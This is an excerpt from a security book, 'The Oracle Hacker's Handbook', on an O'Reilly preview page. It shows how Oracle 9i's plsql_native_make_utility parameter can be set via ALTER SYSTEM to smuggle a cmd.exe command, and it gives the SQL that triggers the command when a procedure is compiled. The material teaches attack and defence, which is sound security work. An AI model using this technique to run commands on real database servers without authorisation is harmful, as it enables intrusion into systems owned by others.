The Oracle® Hacker's Handbook: Hacking and Defending Oracle

10.5. Running OS Commands Using ALTER SYSTEM

This next example is a bit of a "hack" and was never intended by Oracle as a proper method for running commands but it works well. In Oracle 9i it is possible to manipulate the way Oracle compiles native PL/SQL programs. This is done by providing the name of a make program. Clearly, this can be abused to run OS commands:

ALTER SYSTEM SET plsql_native_make_utility = 'cmd.exe /C dir >
c:\ooops.txt &';
ALTER SYSTEM SET plsql_native_make_file_name = ' foo';
ALTER SYSTEM SET plsql_native_library_dir='bar';

CREATE OR REPLACE PROCEDURE ohoh AS
BEGIN
NULL;
END;
/
show errors

When Oracle compiles the ohoh procedure, Oracle executes the following:

cmd.exe /C dir > c:\ooops.txt & -f foo bar/RUN_CMD__SYSTEM__0.DLL

Oracle 10g deprecated the plsql_native_make_utility parameter.

Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

The Oracle® Hacker's Handbook: Hacking and Defending Oracle by David Litchfield

10.5. Running OS Commands Using ALTER SYSTEM

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly